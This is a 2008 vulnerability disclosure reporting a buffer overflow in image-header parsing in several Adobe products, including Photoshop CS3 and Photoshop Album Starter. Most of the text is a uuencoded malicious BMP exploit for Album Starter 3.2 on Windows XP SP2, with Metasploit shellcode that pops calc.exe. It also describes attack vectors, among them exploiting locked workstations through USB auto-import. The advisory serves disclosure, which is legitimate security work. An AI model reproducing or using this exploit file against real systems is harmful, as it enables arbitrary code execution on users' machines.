Exploitable issue in various Adobe products c0ntex (c0ntexb@gmail.com) Scott Laurie February 2008 Vulnerable applications, tested: Adobe Photoshop Album Starter Adobe After Effects CS3 Adobe Photoshop CS3 Not Vulnerable applications, tested: Adobe Reader Adobe Flash Player This bug is related to the parsing of header images, in that the applications do not verify that the image header is valid before trying to render it. This leaves an opportunity to cause an unchecked buffer overflow and allow for the execution of malicious code. All the issues are standard local overflows whereby an attacker can exploit a machine after sending the malicious image to the user, or by placing the image on a web site or email and waiting for a user to view it in one of the effected products. One fun thing with Album Starter is that it will run a service which will look for new devices being attached to the system, things like cameras or USB drives and when one is found it will check the device for image files. If some are found, the application will auto-run and import the images and thus allow the attacker to exploit locked workstations.. pretty lame but fun :) There is a caveats to the bug as the shellcode and return address need to be 4 byte values. Thus a return address of 0x41424344 needs to be in the following format: "\x44\x44\x44\x44\x43\x43\x43\x43\x42\x42\x42\x42\x41\x41\x41\x41" Exploit attached for Album Starter 3.2 on Windows XP SP2 to pop calc.exe: Used shellcode is taken from the Metasploit project. begin 644 Adobe_AS_Exploit.bmp M0DTV`````````#8````H````0`8``+`$```!``@`04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04'\:NM-Z/G___]@BVPD)(M%/(M\!7@![XM/ M&(M?(`'K28LTBP'N,<"9K(3`="#!R@T*`<+K]#M4)"AUY8M?)`'K9HL,2XM? M'`'K`RR+B6PD'&'#,=MDBT,PBT`,BW`5F@>T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_ MT&9H!-)F4XGAE6BD&G#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90 M5%15_]"3:.=YQGE7_]95_]!F:F1F:&-MB>5J4%DIS(GG:D2)XC'`\ZK^0BW^ M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!GIZ=W=W=W9V=G9[N[N[MG9V=ET='1T)"0D)/3T]/1;6UM;@8&!@7-S MGIZ[^_O[\S,S,S# MP\/#T='1T=K:VMJLK*RLBXN+B[2TM+3?W]_?Y^?GYQ,3$Q/V]O;V:FIJ:N?G MY^?^_O[^75U=72\O+R_M[>WMAX>'AUM;6ULL+"PLS,S,S'Y^?GYA86%ANKJZ MN@,#`P..CHZ.+R\O+PL+"PNLK*RLU=75U7Y^?G[O[^_OS,S,S.SL[.S1T='1 MXN+BXFQL;&P!`0$!!04%!?+R\O(F)B8F86%A8='1T='R\O+RK*RLK(N+BXNQ ML;&Q9V=G9WM[>WNNKJZN7EY>7BTM+2T6%A862DI*2CX^/CYE965E9V=G9[JZ MNKK?W]_?+BXN+E]?7U^&AH:&T='1T:ZNKJXK*RLK`0$!`2HJ*BKR\O+RBHJ* MB@$!`0$R,C(RYN;FYLS,S,R#@X.#T='1T6YN;FZ7EY>7BHJ*BEI:6EKN[N[N MK*RLK.+BXN)F9F9FL;&QL186%A9\?'Q\.CHZ.KBXN+BNKJZN'JVMK:V.CHZ.!04%!8:&AH:_O[^_='1T=-#0 MT-#@X.#@<'!P<'5U=76]O;V]C8V-C49&1D;FYN;F.3DY.<#`P,!"0D)"\O+R 1\C\_/S_N[N[N)R